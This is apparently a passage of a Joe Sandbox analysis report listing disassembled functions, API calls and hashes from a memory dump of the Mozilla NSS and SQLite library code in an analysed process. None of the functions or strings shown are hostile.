                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Monitor$Enter$Exit$Value$CriticalSectionUnlock$Leave
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3915314664-0
                                                                                                                                                                                                                                                            • Opcode ID: 87c85be5b811c3b0bb38516803681df1645fbd3192a0d1aa199eac42ac6ae448
                                                                                                                                                                                                                                                            • Instruction ID: 51e8c94c2e62a7deffe334b186c98a2420da477a349101f17e1fc40cf92192ef
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87c85be5b811c3b0bb38516803681df1645fbd3192a0d1aa199eac42ac6ae448
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 002153B7A50601AFDA319A39ED077CBB3B1AB21308F445824D58B86231EB3EF525C742
                                                                                                                                                                                                                                                            Function 6BF4FB20 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 216COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BF4FC3E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: TlsGetValue.KERNEL32(?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18821
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: TlsGetValue.KERNEL32(?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF1883D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: EnterCriticalSection.KERNEL32(?,?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18856
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6BF18887
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: PR_Unlock.NSS3(?,?,?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18899
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BF4FC52
                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BF4FD4F
                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BF4FD6B
                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BF4FD81
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,-00000079,00000020), ref: 6BF4FDDE
                                                                                                                                                                                                                                                              • Part of subcall function 6BF55B40: PR_GetIdentitiesLayer.NSS3 ref: 6BF55B56
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6BF4FDFE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorValuememcpy$CondCriticalEnterIdentitiesLayerSectionUnlockWait
                                                                                                                                                                                                                                                            • String ID: NULL
                                                                                                                                                                                                                                                            • API String ID: 4197343211-324932091
                                                                                                                                                                                                                                                            • Opcode ID: 6f05d5b8cb555488b9eb780776de1fa8fb17b5e453f62964e62b6d6bdca55253
                                                                                                                                                                                                                                                            • Instruction ID: e25a61910a068d40e8c888759c96166b9be65853320cfd97d4f45afdd4cab33d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f05d5b8cb555488b9eb780776de1fa8fb17b5e453f62964e62b6d6bdca55253
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E791AD72D006498FEB50CF69D850BAABBB1FF49304F004569E96D97362EB38A990CF50
                                                                                                                                                                                                                                                            Function 6BFD3980 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BFD3998
                                                                                                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BFD3A08
                                                                                                                                                                                                                                                            • memchr.VCRUNTIME140(0123456789abcdef,00000000,0000000A), ref: 6BFD3A18
                                                                                                                                                                                                                                                            • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BFD3A51
                                                                                                                                                                                                                                                            • memchr.VCRUNTIME140(0123456789abcdef,00000000,?), ref: 6BFD3A64
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memchrtolower$isspace
                                                                                                                                                                                                                                                            • String ID: +$-$0123456789abcdef
                                                                                                                                                                                                                                                            • API String ID: 3040594209-2676945536
                                                                                                                                                                                                                                                            • Opcode ID: 5e287bce23f27063286d91ed93e216b9f4cbad2a13a22a430c54c059ba97f7d0
                                                                                                                                                                                                                                                            • Instruction ID: 0a1aae1aee0d774ac7d30f4a4624ecc8c5eb15e323e12ae1ca99be6413ef85bb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e287bce23f27063286d91ed93e216b9f4cbad2a13a22a430c54c059ba97f7d0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50313A73F041665BEB204ABD4C8236BFBEB9B85310F0C0276CA58D7261E6799D4587E2
                                                                                                                                                                                                                                                            Function 6BECDA40 Relevance: 13.7, APIs: 9, Instructions: 229threadtimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CERT_CheckCertValidTimes.NSS3(00000001,?,?,?,?,?,00000001,?,00000000), ref: 6BECDA78
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC1DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BEC1E0B
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC1DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BEC1E24
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE015,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 6BECDC04
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,?,00000001,?,00000000), ref: 6BECDA8E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89BF0: TlsGetValue.KERNEL32(?,?,?,6BFD0A75), ref: 6BF89C07
                                                                                                                                                                                                                                                              • Part of subcall function 6BECC9A0: PORT_ArenaAlloc_Util.NSS3(00000000,00000018,?,00000001,00000000,?,6BECD864,?,00000000,?), ref: 6BECC9AE
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE05A,00000000,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 6BECDB5D
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 6BECDB70
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE05B,00000000,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 6BECDB98
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 6BECDBAD
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 6BECDC19
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6BECDCAB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentThread$ErrorUtil$Choice_DecodeTime$Alloc_ArenaCertCheckTimesValidValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3515923558-0
                                                                                                                                                                                                                                                            • Opcode ID: 509924b8a2f584ac430b051acdfe5caf99c083fb03b04eb15fbca72b302c530d
                                                                                                                                                                                                                                                            • Instruction ID: 709d801fac0a54b8be1a98e9f4395db515795c8d92ea283d567efb90b5fdedec
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 509924b8a2f584ac430b051acdfe5caf99c083fb03b04eb15fbca72b302c530d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E371EB7AA801059BDF009FA4CE41BAF7775EF84318F248168ED3597361E73AE921C792
                                                                                                                                                                                                                                                            Function 6BEC8980 Relevance: 13.6, APIs: 9, Instructions: 150memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000,00000000,?,00000028,?,?,6BEC7310), ref: 6BEC89B8
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF21228
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6BF21238
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF2124B
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PR_CallOnce.NSS3(6C022AA4,6BF212D0,00000000,00000000,00000000,?,6BEC88A4,00000000,00000000), ref: 6BF2125D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6BF2126F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6BF21280
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6BF2128E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6BF2129A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6BF212A1
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000000,?,00000028,?,?,6BEC7310), ref: 6BEC89E6
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000004,00000004,00000004,?), ref: 6BEC8A00
                                                                                                                                                                                                                                                            • CERT_CopyRDN.NSS3(00000004,00000000,6BEC7310,?,?,00000004,?), ref: 6BEC8A1B
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(00000004,00000000,?,?,?,?,?,?,?,00000004,?), ref: 6BEC8A74
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,00000000,?,00000028,?,?,6BEC7310), ref: 6BEC8AAF
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000004,00000008,00000000,?,00000028,?,?,6BEC7310), ref: 6BEC8AF3
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(00000004,?,C8850FC0,00000000,00000000,?,00000028,?,?,6BEC7310), ref: 6BEC8B1D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Arena$Util$Alloc_$CriticalFreeGrow_PoolSectionfree$Arena_CallClearCopyDeleteEnterErrorOnceUnlockValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3791662518-0
                                                                                                                                                                                                                                                            • Opcode ID: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
                                                                                                                                                                                                                                                            • Instruction ID: d49a051b80dde8f6b83abb8617c251cb16256e69c304986ff990ff8adace322d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0451E671A00210AFE7508F64CE41B7B77A4EF4275CF258298EC299B391E739E911CB92
                                                                                                                                                                                                                                                            Function 6BE4BA00 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 222COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BE4BAAC
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(?,00000000,?,40000000,40000000,?,?), ref: 6BE4BAE5
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0000E558,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6BE4BB9F
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0000E578,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,40000000,40000000,?,?), ref: 6BE4BC50
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: sqlite3_log$Unothrow_t@std@@@__ehfuncinfo$??2@memset
                                                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                            • API String ID: 1408368353-598938438
                                                                                                                                                                                                                                                            • Opcode ID: 4cb8a40552c9511524c1bdbf93c483b5bb618b76663968109634255f1924f2fd
                                                                                                                                                                                                                                                            • Instruction ID: c8795a4981706237ba4b02a9177e4050e25de3e224674212c28c723a03ec65ab
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cb8a40552c9511524c1bdbf93c483b5bb618b76663968109634255f1924f2fd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C81BD31E04200DBEB048F34E985B5E73B6BF85318F3584A9E81A8B355DB3CE852CB91
                                                                                                                                                                                                                                                            Function 6BEB69A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BE4CA30: EnterCriticalSection.KERNEL32(?,?,?,6BEAF9C9,?,6BEAF4DA,6BEAF9C9,?,?,6BE7369A), ref: 6BE4CA7A
                                                                                                                                                                                                                                                              • Part of subcall function 6BE4CA30: LeaveCriticalSection.KERNEL32(?), ref: 6BE4CB26
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BEB6A02
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6BEB6AA6
                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6BEB6AF9
                                                                                                                                                                                                                                                            • sqlite3_free.NSS3(00000000), ref: 6BEB6B15
                                                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6BEB6BA6
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • winDelete, xrefs: 6BEB6B71
                                                                                                                                                                                                                                                            • delayed %dms for lock/sharing conflict at line %d, xrefs: 6BEB6B9F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
                                                                                                                                                                                                                                                            • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                                                            • API String ID: 1816828315-1405699761
                                                                                                                                                                                                                                                            • Opcode ID: b78ab92ce71fb6030beb6cb1f831b7dac70a2ccc286a746cc6fb48d197d59f4d
                                                                                                                                                                                                                                                            • Instruction ID: 5d0d7d00384be3d30448ea14e4591d2dc6563755c3ec4f18fc92d45399a101e2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b78ab92ce71fb6030beb6cb1f831b7dac70a2ccc286a746cc6fb48d197d59f4d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0051E632B001059FEF08ABA4DD9AE7EB775EF46314B244128E92697690DF3C9941CB92
                                                                                                                                                                                                                                                            Function 6BEABB80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6BEB21BC), ref: 6BEABB8C
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6BEABBEB
                                                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6BEABBFB
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 6BEABC03
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6BEABC19
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BEABC22
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$CountCriticalInitializeLastSectionSpincallocfree
                                                                                                                                                                                                                                                            • String ID: ffff
                                                                                                                                                                                                                                                            • API String ID: 2588245028-3827681309
                                                                                                                                                                                                                                                            • Opcode ID: 884ddca70c8c951f31b08a0eec8c89571826648198baaa727feed1c841b608e8
                                                                                                                                                                                                                                                            • Instruction ID: 8fb0152c9922629308f6f5d47466d3a0d23f81082d79698bd59a7aad3a0dbe4e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 884ddca70c8c951f31b08a0eec8c89571826648198baaa727feed1c841b608e8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6911C675B406016BDB10AFBDED06B4BBAE8AF05B59F10003DF54ADAA80DF34E010CB96
                                                                                                                                                                                                                                                            Function 6BED8B50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,6BEE0948,00000000), ref: 6BED8B6B
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,6BEE0948,00000000), ref: 6BED8B80
                                                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?,?,?,?,6BEE0948,00000000), ref: 6BED8B8F
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,6BEE0948,00000000), ref: 6BED8BA1
                                                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,6BEE0948,00000000), ref: 6BED8BAC
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6BEE0948,00000000), ref: 6BED8BB8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalSection$ArenaDeleteEnterFinishPoolUnlockValuefree
                                                                                                                                                                                                                                                            • String ID: Hk
                                                                                                                                                                                                                                                            • API String ID: 1456478736-2496449461
                                                                                                                                                                                                                                                            • Opcode ID: 109b7715d90fe8d6dbcdad4fc92c5784698e7fd5dd6f089e68548812cec16fec
                                                                                                                                                                                                                                                            • Instruction ID: 7cb6e9ce2d8e4da671e6119baf1d126c1626b45ec4dc4d5e101fba70cf333267
